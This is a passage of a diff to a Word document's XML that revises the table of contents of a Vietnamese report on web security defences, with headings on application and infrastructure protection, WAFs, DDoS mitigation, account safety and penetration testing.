+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Phòng chống ở cấp độ Ứng dụng</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343467 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC3"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="1320"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343468" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>3.1.1.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+          </w:rPr>
           <w:t>Tiểu mục cấp 3</w:t>
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -2234,7 +3926,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -2242,22 +3933,19 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc207351937 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343468 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -2265,7 +3953,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -2273,7 +3960,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -2285,15 +3971,20 @@
       <w:pPr>
         <w:pStyle w:val="TOC4"/>
         <w:tabs>
-          <w:tab w:val="left" w:pos="1920"/>
+          <w:tab w:val="left" w:pos="1760"/>
           <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
           <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc207351938" w:history="1">
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343469" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2302,12 +3993,17 @@
             <w:iCs/>
             <w:noProof/>
           </w:rPr>
-          <w:t>4.1.1.1.</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
+          <w:t>3.1.1.1.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
           </w:rPr>
           <w:tab/>
         </w:r>
@@ -2323,7 +4019,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -2331,7 +4026,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -2339,22 +4033,19 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc207351938 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343469 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -2362,7 +4053,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -2370,7 +4060,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -2382,15 +4071,20 @@
       <w:pPr>
         <w:pStyle w:val="TOC2"/>
         <w:tabs>
-          <w:tab w:val="left" w:pos="960"/>
+          <w:tab w:val="left" w:pos="880"/>
           <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
           <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc207351939" w:history="1">
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343470" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2399,12 +4093,17 @@
             <w:bCs/>
             <w:noProof/>
           </w:rPr>
-          <w:t>4.2.</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
+          <w:t>3.2.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
           </w:rPr>
           <w:tab/>
         </w:r>
@@ -2416,19 +4115,119 @@
             <w:bCs/>
             <w:noProof/>
           </w:rPr>
-          <w:t>Tiểu mục cấp 2</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
+          <w:t>Phòng chống ở cấp độ Hạ tầng</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343470 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC3"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="1320"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343471" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>3.2.1.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
           </w:rPr>
           <w:tab/>
         </w:r>
         <w:r>
           <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Tường lửa Ứng dụng Web (WAF)</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -2436,22 +4235,221 @@
         </w:r>
         <w:r>
           <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343471 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC3"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="1320"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343472" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc207351939 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>3.2.2.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Các giải pháp chống DDoS</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343472 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC2"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="880"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343473" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>3.3.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Các biện pháp an toàn cho Tài khoản và Quản trị</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343473 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -2459,15 +4457,617 @@
         </w:r>
         <w:r>
           <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC1"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="480"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343474" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>4.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>THỰC HÀNH VÀ ĐÁNH GIÁ BẢO MẬT</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343474 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>3</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC2"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="880"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343475" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>2</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>4.1.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Giới thiệu về Kiểm thử Xâm nhập (Pentesting)</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343475 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>3</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC3"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="1320"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343476" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>4.1.1.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Tiểu mục cấp 3</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343476 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>3</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC4"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="1760"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
